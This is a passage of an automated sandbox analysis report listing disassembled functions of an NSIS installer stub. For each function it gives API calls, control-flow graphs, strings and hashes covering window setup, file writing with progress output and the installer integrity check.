                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                              • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                              • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                                                                                                                                              • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                              Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,QuarterWalt,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,QuarterWalt,QuarterWalt,00000000,00000000,QuarterWalt,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                              • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$QuarterWalt
                                                                                                                                                                                                                                                                              • API String ID: 4286501637-4128698268
                                                                                                                                                                                                                                                                              • Opcode ID: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                                                                                                                                                                                                                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                              Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 653 40337f-403398 654 4033a1-4033a9 653->654 655 40339a 653->655 656 4033b2-4033b7 654->656 657 4033ab 654->657 655->654 658 4033c7-4033d4 call 403336 656->658 659 4033b9-4033c2 call 403368 656->659 657->656 663 4033d6 658->663 664 4033de-4033e5 658->664 659->658 665 4033d8-4033d9 663->665 666 403546-403548 664->666 667 4033eb-403432 GetTickCount 664->667 670 403567-40356b 665->670 668 40354a-40354d 666->668 669 4035ac-4035af 666->669 671 403564 667->671 672 403438-403440 667->672 673 403552-40355b call 403336 668->673 674 40354f 668->674 675 4035b1 669->675 676 40356e-403574 669->676 671->670 677 403442 672->677 678 403445-403453 call 403336 672->678 673->663 686 403561 673->686 674->673 675->671 681 403576 676->681 682 403579-403587 call 403336 676->682 677->678 678->663 687 403455-40345e 678->687 681->682 682->663 690 40358d-40359f WriteFile 682->690 686->671 689 403464-403484 call 4076a0 687->689 696 403538-40353a 689->696 697 40348a-40349d GetTickCount 689->697 692 4035a1-4035a4 690->692 693 40353f-403541 690->693 692->693 695 4035a6-4035a9 692->695 693->665 695->669 696->665 698 4034e8-4034ec 697->698 699 40349f-4034a7 697->699 700 40352d-403530 698->700 701 4034ee-4034f1 698->701 702 4034a9-4034ad 699->702 703 4034af-4034e0 MulDiv wsprintfW call 404f9e 699->703 700->672 707 403536 700->707 705 403513-40351e 701->705 706 4034f3-403507 WriteFile 701->706 702->698 702->703 708 4034e5 703->708 710 403521-403525 705->710 706->693 709 403509-40350c 706->709 707->671 708->698 709->693 711 40350e-403511 709->711 710->689 712 40352b 710->712 711->710 712->671
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00426976,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                              • String ID: (]C$... %d%%$pAB$viB$y)B
                                                                                                                                                                                                                                                                              • API String ID: 651206458-3423946372
                                                                                                                                                                                                                                                                              • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                              • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                              Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 713 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 716 403603-403608 713->716 717 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 713->717 718 4037e2-4037e6 716->718 725 403641 717->725 726 403728-403736 call 4032d2 717->726 728 403646-40365d 725->728 732 4037f1-4037f6 726->732 733 40373c-40373f 726->733 730 403661-403663 call 403336 728->730 731 40365f 728->731 737 403668-40366a 730->737 731->730 732->718 735 403741-403759 call 403368 call 403336 733->735 736 40376b-403795 GlobalAlloc call 403368 call 40337f 733->736 735->732 764 40375f-403765 735->764 736->732 762 403797-4037a8 736->762 740 403670-403677 737->740 741 4037e9-4037f0 call 4032d2 737->741 742 4036f3-4036f7 740->742 743 403679-40368d call 405e38 740->743 741->732 749 403701-403707 742->749 750 4036f9-403700 call 4032d2 742->750 743->749 760 40368f-403696 743->760 753 403716-403720 749->753 754 403709-403713 call 4072ad 749->754 750->749 753->728 761 403726 753->761 754->753 760->749 766 403698-40369f 760->766 761->726 767 4037b0-4037b3 762->767 768 4037aa 762->768 764->732 764->736 766->749 769 4036a1-4036a8 766->769 770 4037b6-4037be 767->770 768->767 769->749 771 4036aa-4036b1 769->771 770->770 772 4037c0-4037db SetFilePointer call 405e38 770->772 771->749 773 4036b3-4036d3 771->773 776 4037e0 772->776 773->732 775 4036d9-4036dd 773->775 777 4036e5-4036ed 775->777 778 4036df-4036e3 775->778 776->718 777->749 779 4036ef-4036f1 777->779 778->761 778->777 779->749
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                              • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                              • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                              • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                              • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                              • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                                                                                                                                              Function 00404F9E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 780 404f9e-404fb1 781 404fb7-404fca 780->781 782 40506e-405070 780->782 783 404fd5-404fe1 lstrlenW 781->783 784 404fcc-404fd0 call 406831 781->784 786 404fe3-404ff3 lstrlenW 783->786 787 404ffe-405002 783->787 784->783 788 404ff5-404ff9 lstrcatW 786->788 789 40506c-40506d 786->789 790 405011-405015 787->790 791 405004-40500b SetWindowTextW 787->791 788->787 789->782 792 405017-405059 SendMessageW * 3 790->792 793 40505b-40505d 790->793 791->790 792->793 793->789 794 40505f-405064 793->794 794->789
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(Completed,00426976,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(004034E5,Completed,00426976,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(Completed,004034E5,004034E5,Completed,00426976,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(Completed,Completed), ref: 0040500B
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                              • String ID: Completed
                                                                                                                                                                                                                                                                              • API String ID: 2740478559-3087654605
                                                                                                                                                                                                                                                                              • Opcode ID: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                                                                                                                                                                                                                                              • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                              Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                              control_flow_graph 795 401eb9-401ec4 796 401f24-401f26 795->796 797 401ec6-401ec9 795->797 798 401f53-401f69 GlobalAlloc call 406831 796->798 799 401f28-401f2a 796->799 800 401ed5-401ee3 call 4062cf 797->800 801 401ecb-401ecf 797->801 811 401f6e-401f7b 798->811 802 401f3c-401f4e call 406035 799->802 803 401f2c-401f36 call 4062cf 799->803 813 401ee4-402702 call 406831 800->813 801->797 804 401ed1-401ed3 801->804 817 402387-40238d GlobalFree 802->817 803->802 804->800 808 401ef7-402e50 call 406035 * 3 804->808 816 4030e3-4030f2 808->816 811->816 811->817 828 402708-40270e 813->828 817->816 828->816
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00634E08), ref: 00402387
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                              • String ID: Exch: stack < %d elements$Pop: stack empty$QuarterWalt
                                                                                                                                                                                                                                                                              • API String ID: 1459762280-2380928645
                                                                                                                                                                                                                                                                              • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                                                                                                                                              • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
